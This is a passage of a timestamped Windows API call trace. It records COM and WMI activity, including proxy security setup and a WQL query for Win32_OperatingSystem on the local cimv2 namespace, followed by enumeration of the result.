	[0220.287] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x1b86e520, pProxy=0x1cc3b2b8, pAuthnSvc=0x1c68c6b0, pAuthzSvc=0x1c68c6ac, pServerPrincName=0x1c68c6d8, pAuthnLevel=0x1c68c6a8, pImpLevel=0x1c68c6c4, pAuthInfo=0x1c68c6e8, pCapabilites=0x1c68c6c0 | out: pAuthnSvc=0x1c68c6b0*=0xa, pAuthzSvc=0x1c68c6ac*=0x0, pServerPrincName=0x1c68c6d8, pAuthnLevel=0x1c68c6a8*=0x6, pImpLevel=0x1c68c6c4*=0x2, pAuthInfo=0x1c68c6e8, pCapabilites=0x1c68c6c0*=0x1) returned 0x0
	[0220.287] WbemLocator:IUnknown:Release (This=0x1b86e520) returned 0x1
	[0220.287] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc3b2b8, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c658 | out: ppvObject=0x1c68c658*=0x1b86e560) returned 0x0
	[0220.287] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc3b2b8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c5e8 | out: ppvObject=0x1c68c5e8*=0x1b86e520) returned 0x0
	[0220.287] WbemLocator:IClientSecurity:SetBlanket (This=0x1b86e520, pProxy=0x1cc3b2b8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0220.287] WbemLocator:IUnknown:Release (This=0x1b86e520) returned 0x2
	[0220.288] WbemLocator:IUnknown:Release (This=0x1b86e560) returned 0x1
	[0220.288] CoTaskMemFree (pv=0x1b885980) 
	[0220.288] WbemLocator:IUnknown:Release (This=0x1cc3e160) returned 0x0
	[0220.288] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc3b2b8, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c2d0 | out: ppvObject=0x1c68c2d0*=0x1b86e560) returned 0x0
	[0220.288] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e560, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c68c350 | out: ppvObject=0x1c68c350*=0x0) returned 0x80004002
	[0220.289] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e560, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c68c0e8 | out: ppvObject=0x1c68c0e8*=0x0) returned 0x80004002
	[0220.290] WbemLocator:IUnknown:AddRef (This=0x1b86e560) returned 0x3
	[0220.290] CoGetContextToken (in: pToken=0x1c68bfa0 | out: pToken=0x1c68bfa0) returned 0x0
	[0220.290] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e560, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bf60 | out: ppvObject=0x1c68bf60*=0x1b86e448) returned 0x0
	[0220.290] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b86e448, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c68bf90 | out: pCid=0x1c68bf90*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0220.290] WbemLocator:IUnknown:Release (This=0x1b86e448) returned 0x3
	[0220.291] CoGetContextToken (in: pToken=0x1c68bf70 | out: pToken=0x1c68bf70) returned 0x0
	[0220.291] WbemLocator:IUnknown:AddRef (This=0x1b86e560) returned 0x4
	[0220.291] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e560, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c088 | out: ppvObject=0x1c68c088*=0x1b86e530) returned 0x0
	[0220.291] WbemLocator:IUnknown:Release (This=0x1b86e560) returned 0x4
	[0220.291] WbemLocator:IRpcOptions:Query (in: This=0x1b86e530, pPrx=0x1b86e560, dwProperty=2, pdwValue=0x1c68c0f8 | out: pdwValue=0x1c68c0f8) returned 0x80004002
	[0220.291] WbemLocator:IUnknown:Release (This=0x1b86e530) returned 0x3
	[0220.292] WbemLocator:IUnknown:Release (This=0x1b86e560) returned 0x2
	[0220.292] CoGetContextToken (in: pToken=0x1c68c470 | out: pToken=0x1c68c470) returned 0x0
	[0220.292] CoGetContextToken (in: pToken=0x1c68c3b0 | out: pToken=0x1c68c3b0) returned 0x0
	[0220.292] WbemLocator:IUnknown:AddRef (This=0x1b86e560) returned 0x3
	[0220.292] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e560, riid=0x1c68c4f0*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x1c68c4d0 | out: ppvObject=0x1c68c4d0*=0x1cc3b2b8) returned 0x0
	[0220.292] WbemLocator:IUnknown:Release (This=0x1b86e560) returned 0x3
	[0220.292] WbemLocator:IUnknown:Release (This=0x1cc3b2b8) returned 0x2
	[0220.293] WbemLocator:IUnknown:Release (This=0x1cc3b2b8) returned 0x1
	[0220.293] CoGetContextToken (in: pToken=0x1c68ca70 | out: pToken=0x1c68ca70) returned 0x0
	[0220.293] WbemLocator:IUnknown:AddRef (This=0x1b86e560) returned 0x2
	[0220.293] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e560, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c640 | out: ppvObject=0x1c68c640*=0x1b86e560) returned 0x0
	[0220.293] WbemLocator:IUnknown:Release (This=0x1b86e560) returned 0x2
	[0220.293] WbemLocator:IUnknown:Release (This=0x1b86e560) returned 0x1
	[0220.293] CoGetContextToken (in: pToken=0x1c68c710 | out: pToken=0x1c68c710) returned 0x0
	[0220.293] CoGetContextToken (in: pToken=0x1c68c650 | out: pToken=0x1c68c650) returned 0x0
	[0220.293] WbemLocator:IUnknown:AddRef (This=0x1b86e560) returned 0x2
	[0220.294] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e560, riid=0x1c68c790*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x1c68c770 | out: ppvObject=0x1c68c770*=0x1cc3b2b8) returned 0x0
	[0220.294] WbemLocator:IUnknown:Release (This=0x1b86e560) returned 0x2
	[0220.294] WbemLocator:IUnknown:AddRef (This=0x1cc3b2b8) returned 0x3
	[0220.294] IWbemServices:ExecQuery (in: This=0x1cc3b2b8, strQueryLanguage="WQL", strQuery="select * from Win32_OperatingSystem", lFlags=16, pCtx=0x0, ppEnum=0x1c68cc08 | out: ppEnum=0x1c68cc08*=0x1cc3c728) returned 0x0
	[0220.300] IUnknown:QueryInterface (in: This=0x1cc3c728, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c818 | out: ppvObject=0x1c68c818*=0x1cc3c730) returned 0x0
	[0220.300] IClientSecurity:QueryBlanket (in: This=0x1cc3c730, pProxy=0x1cc3c728, pAuthnSvc=0x1c68c810, pAuthzSvc=0x1c68c80c, pServerPrincName=0x1c68c838, pAuthnLevel=0x1c68c808, pImpLevel=0x1c68c824, pAuthInfo=0x1c68c848, pCapabilites=0x1c68c820 | out: pAuthnSvc=0x1c68c810*=0xa, pAuthzSvc=0x1c68c80c*=0x0, pServerPrincName=0x1c68c838, pAuthnLevel=0x1c68c808*=0x6, pImpLevel=0x1c68c824*=0x2, pAuthInfo=0x1c68c848, pCapabilites=0x1c68c820*=0x1) returned 0x0
	[0220.300] IUnknown:Release (This=0x1cc3c730) returned 0x1
	[0220.301] IUnknown:QueryInterface (in: This=0x1cc3c728, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c7b8 | out: ppvObject=0x1c68c7b8*=0x1b86e260) returned 0x0
	[0220.301] IUnknown:QueryInterface (in: This=0x1cc3c728, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c748 | out: ppvObject=0x1c68c748*=0x1cc3c730) returned 0x0
	[0220.301] IClientSecurity:SetBlanket (This=0x1cc3c730, pProxy=0x1cc3c728, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0220.302] IUnknown:Release (This=0x1cc3c730) returned 0x2
	[0220.302] WbemLocator:IUnknown:Release (This=0x1b86e260) returned 0x1
	[0220.303] CoTaskMemFree (pv=0x1b885bf0) 
	[0220.303] IUnknown:QueryInterface (in: This=0x1cc3c728, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c3f0 | out: ppvObject=0x1c68c3f0*=0x1b86e260) returned 0x0
	[0220.303] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e260, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c68c470 | out: ppvObject=0x1c68c470*=0x0) returned 0x80004002
	[0220.304] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e260, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c68c208 | out: ppvObject=0x1c68c208*=0x0) returned 0x80004002
	[0220.304] WbemLocator:IUnknown:AddRef (This=0x1b86e260) returned 0x3
	[0220.304] CoGetContextToken (in: pToken=0x1c68c0c0 | out: pToken=0x1c68c0c0) returned 0x0
	[0220.304] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e260, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c080 | out: ppvObject=0x1c68c080*=0x1b86e148) returned 0x0
	[0220.305] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b86e148, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c68c0b0 | out: pCid=0x1c68c0b0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0220.305] WbemLocator:IUnknown:Release (This=0x1b86e148) returned 0x3
	[0220.305] CoGetContextToken (in: pToken=0x1c68c090 | out: pToken=0x1c68c090) returned 0x0
	[0220.305] WbemLocator:IUnknown:AddRef (This=0x1b86e260) returned 0x4
	[0220.305] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e260, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c1a8 | out: ppvObject=0x1c68c1a8*=0x1b86e230) returned 0x0
	[0220.306] WbemLocator:IUnknown:Release (This=0x1b86e260) returned 0x4
	[0220.306] WbemLocator:IRpcOptions:Query (in: This=0x1b86e230, pPrx=0x1b86e260, dwProperty=2, pdwValue=0x1c68c218 | out: pdwValue=0x1c68c218) returned 0x80004002
	[0220.306] WbemLocator:IUnknown:Release (This=0x1b86e230) returned 0x3
	[0220.306] WbemLocator:IUnknown:Release (This=0x1b86e260) returned 0x2
	[0220.306] CoGetContextToken (in: pToken=0x1c68c590 | out: pToken=0x1c68c590) returned 0x0
	[0220.306] CoGetContextToken (in: pToken=0x1c68c4d0 | out: pToken=0x1c68c4d0) returned 0x0
	[0220.306] WbemLocator:IUnknown:AddRef (This=0x1b86e260) returned 0x3
	[0220.306] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e260, riid=0x1c68c610*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c68c5f0 | out: ppvObject=0x1c68c5f0*=0x1cc3c728) returned 0x0
	[0220.306] WbemLocator:IUnknown:Release (This=0x1b86e260) returned 0x3
	[0220.307] IUnknown:Release (This=0x1cc3c728) returned 0x2
	[0220.307] IUnknown:Release (This=0x1cc3c728) returned 0x1
	[0220.307] WbemLocator:IUnknown:Release (This=0x1cc3b2b8) returned 0x2
	[0220.307] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc360a0, puCount=0x1c68cbb0 | out: puCount=0x1c68cbb0*=0x2) returned 0x0
	[0220.307] WbemDefPath:IWbemPath:GetText (in: This=0x1cc360a0, lFlags=4, puBuffLength=0x1c68cbb0*=0x0, pszText=0x0 | out: puBuffLength=0x1c68cbb0*=0x17, pszText=0x0) returned 0x0
	[0220.307] WbemDefPath:IWbemPath:GetText (in: This=0x1cc360a0, lFlags=4, puBuffLength=0x1c68cbb0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68cbb0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0220.307] CoGetContextToken (in: pToken=0x1c68c7b0 | out: pToken=0x1c68c7b0) returned 0x0
	[0220.307] CoGetContextToken (in: pToken=0x1c68c6f0 | out: pToken=0x1c68c6f0) returned 0x0
	[0220.307] WbemLocator:IUnknown:AddRef (This=0x1b86e260) returned 0x2
	[0220.307] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e260, riid=0x1c68c830*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c68c810 | out: ppvObject=0x1c68c810*=0x1cc3c728) returned 0x0
	[0220.308] WbemLocator:IUnknown:Release (This=0x1b86e260) returned 0x2
	[0220.308] IUnknown:AddRef (This=0x1cc3c728) returned 0x3
	[0220.308] IEnumWbemClassObject:Clone (in: This=0x1cc3c728, ppEnum=0x1c68cc70 | out: ppEnum=0x1c68cc70*=0x1cc381d8) returned 0x0
	[0220.309] IUnknown:QueryInterface (in: This=0x1cc381d8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c8c8 | out: ppvObject=0x1c68c8c8*=0x1cc381e0) returned 0x0
	[0220.309] IClientSecurity:QueryBlanket (in: This=0x1cc381e0, pProxy=0x1cc381d8, pAuthnSvc=0x1c68c8c0, pAuthzSvc=0x1c68c8bc, pServerPrincName=0x1c68c8e8, pAuthnLevel=0x1c68c8b8, pImpLevel=0x1c68c8d4, pAuthInfo=0x1c68c8f8, pCapabilites=0x1c68c8d0 | out: pAuthnSvc=0x1c68c8c0*=0xa, pAuthzSvc=0x1c68c8bc*=0x0, pServerPrincName=0x1c68c8e8, pAuthnLevel=0x1c68c8b8*=0x6, pImpLevel=0x1c68c8d4*=0x2, pAuthInfo=0x1c68c8f8, pCapabilites=0x1c68c8d0*=0x1) returned 0x0
	[0220.309] IUnknown:Release (This=0x1cc381e0) returned 0x1
	[0220.309] IUnknown:QueryInterface (in: This=0x1cc381d8, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c868 | out: ppvObject=0x1c68c868*=0x1b86e0e0) returned 0x0
	[0220.309] IUnknown:QueryInterface (in: This=0x1cc381d8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c7f8 | out: ppvObject=0x1c68c7f8*=0x1cc381e0) returned 0x0
	[0220.309] IClientSecurity:SetBlanket (This=0x1cc381e0, pProxy=0x1cc381d8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0220.311] IUnknown:Release (This=0x1cc381e0) returned 0x2
	[0220.311] WbemLocator:IUnknown:Release (This=0x1b86e0e0) returned 0x1
	[0220.311] CoTaskMemFree (pv=0x1b8860d0) 
	[0220.311] IUnknown:QueryInterface (in: This=0x1cc381d8, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c490 | out: ppvObject=0x1c68c490*=0x1b86e0e0) returned 0x0
	[0220.312] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e0e0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c68c510 | out: ppvObject=0x1c68c510*=0x0) returned 0x80004002
	[0220.312] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e0e0, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c68c2a8 | out: ppvObject=0x1c68c2a8*=0x0) returned 0x80004002
	[0220.313] WbemLocator:IUnknown:AddRef (This=0x1b86e0e0) returned 0x3
	[0220.313] CoGetContextToken (in: pToken=0x1c68c160 | out: pToken=0x1c68c160) returned 0x0
	[0220.313] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e0e0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c120 | out: ppvObject=0x1c68c120*=0x1b86dfc8) returned 0x0
	[0220.313] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b86dfc8, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c68c150 | out: pCid=0x1c68c150*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0220.313] WbemLocator:IUnknown:Release (This=0x1b86dfc8) returned 0x3
	[0220.314] CoGetContextToken (in: pToken=0x1c68c130 | out: pToken=0x1c68c130) returned 0x0
	[0220.314] WbemLocator:IUnknown:AddRef (This=0x1b86e0e0) returned 0x4
	[0220.314] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e0e0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c248 | out: ppvObject=0x1c68c248*=0x1b86e0b0) returned 0x0
	[0220.314] WbemLocator:IUnknown:Release (This=0x1b86e0e0) returned 0x4
	[0220.314] WbemLocator:IRpcOptions:Query (in: This=0x1b86e0b0, pPrx=0x1b86e0e0, dwProperty=2, pdwValue=0x1c68c2b8 | out: pdwValue=0x1c68c2b8) returned 0x80004002
	[0220.314] WbemLocator:IUnknown:Release (This=0x1b86e0b0) returned 0x3
	[0220.314] WbemLocator:IUnknown:Release (This=0x1b86e0e0) returned 0x2
	[0220.314] CoGetContextToken (in: pToken=0x1c68c630 | out: pToken=0x1c68c630) returned 0x0
	[0220.314] CoGetContextToken (in: pToken=0x1c68c570 | out: pToken=0x1c68c570) returned 0x0
	[0220.314] WbemLocator:IUnknown:AddRef (This=0x1b86e0e0) returned 0x3
	[0220.314] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e0e0, riid=0x1c68c6b0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c68c690 | out: ppvObject=0x1c68c690*=0x1cc381d8) returned 0x0
	[0220.315] WbemLocator:IUnknown:Release (This=0x1b86e0e0) returned 0x3
	[0220.315] IUnknown:Release (This=0x1cc381d8) returned 0x2
	[0220.315] IUnknown:Release (This=0x1cc381d8) returned 0x1
	[0220.315] IUnknown:Release (This=0x1cc3c728) returned 0x2
	[0220.315] CoGetContextToken (in: pToken=0x1c68ca30 | out: pToken=0x1c68ca30) returned 0x0
	[0220.315] CoGetContextToken (in: pToken=0x1c68c970 | out: pToken=0x1c68c970) returned 0x0
	[0220.315] WbemLocator:IUnknown:AddRef (This=0x1b86e0e0) returned 0x2
	[0220.315] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e0e0, riid=0x1c68cab0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c68ca90 | out: ppvObject=0x1c68ca90*=0x1cc381d8) returned 0x0
	[0220.316] WbemLocator:IUnknown:Release (This=0x1b86e0e0) returned 0x2
	[0220.316] IUnknown:AddRef (This=0x1cc381d8) returned 0x3
	[0220.316] IEnumWbemClassObject:Reset (This=0x1cc381d8) returned 0x0
	[0220.316] IUnknown:Release (This=0x1cc381d8) returned 0x2
	[0220.317] CoTaskMemAlloc (cb=0x8) returned 0x1b867740
	[0220.317] IEnumWbemClassObject:Next (in: This=0x1cc381d8, lTimeout=-1, uCount=0x1, apObjects=0x1b867740, puReturned=0x1c68ccb8 | out: apObjects=0x1b867740*=0x1cc3e8d0, puReturned=0x1c68ccb8*=0x1) returned 0x0
	[0220.319] IUnknown:QueryInterface (in: This=0x1cc3e8d0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bfe0 | out: ppvObject=0x1c68bfe0*=0x1cc3e8d0) returned 0x0
	[0220.320] IUnknown:QueryInterface (in: This=0x1cc3e8d0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c68c060 | out: ppvObject=0x1c68c060*=0x0) returned 0x80004002
	[0220.320] IUnknown:QueryInterface (in: This=0x1cc3e8d0, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c68bdf8 | out: ppvObject=0x1c68bdf8*=0x0) returned 0x80004002
	[0220.320] IUnknown:AddRef (This=0x1cc3e8d0) returned 0x3
	[0220.320] CoGetContextToken (in: pToken=0x1c68bcb0 | out: pToken=0x1c68bcb0) returned 0x0
	[0220.320] IUnknown:QueryInterface (in: This=0x1cc3e8d0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bc70 | out: ppvObject=0x1c68bc70*=0x1cc3e8d8) returned 0x0
	[0220.321] IMarshal:GetUnmarshalClass (in: This=0x1cc3e8d8, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c68bca0 | out: pCid=0x1c68bca0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0
	[0220.321] IUnknown:Release (This=0x1cc3e8d8) returned 0x3
	[0220.321] CoGetContextToken (in: pToken=0x1c68bc80 | out: pToken=0x1c68bc80) returned 0x0
	[0220.321] IUnknown:AddRef (This=0x1cc3e8d0) returned 0x4
	[0220.321] IUnknown:QueryInterface (in: This=0x1cc3e8d0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bd98 | out: ppvObject=0x1c68bd98*=0x0) returned 0x80004002
	[0220.321] IUnknown:Release (This=0x1cc3e8d0) returned 0x3
	[0220.321] IUnknown:Release (This=0x1cc3e8d0) returned 0x2
	[0220.321] CoGetContextToken (in: pToken=0x1c68c140 | out: pToken=0x1c68c140) returned 0x0
	[0220.322] CoGetContextToken (in: pToken=0x1c68c080 | out: pToken=0x1c68c080) returned 0x0
	[0220.322] IUnknown:AddRef (This=0x1cc3e8d0) returned 0x3
	[0220.322] IUnknown:QueryInterface (in: This=0x1cc3e8d0, riid=0x1c68c1c0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c68c1a0 | out: ppvObject=0x1c68c1a0*=0x1cc3e8d0) returned 0x0
	[0220.322] IUnknown:Release (This=0x1cc3e8d0) returned 0x3
	[0220.322] IUnknown:Release (This=0x1cc3e8d0) returned 0x2
	[0220.322] IUnknown:Release (This=0x1cc3e8d0) returned 0x1
	[0220.322] CoTaskMemFree (pv=0x1b867740) 
	[0220.322] CoGetContextToken (in: pToken=0x1c68cac0 | out: pToken=0x1c68cac0) returned 0x0
	[0220.322] IUnknown:AddRef (This=0x1cc3e8d0) returned 0x2
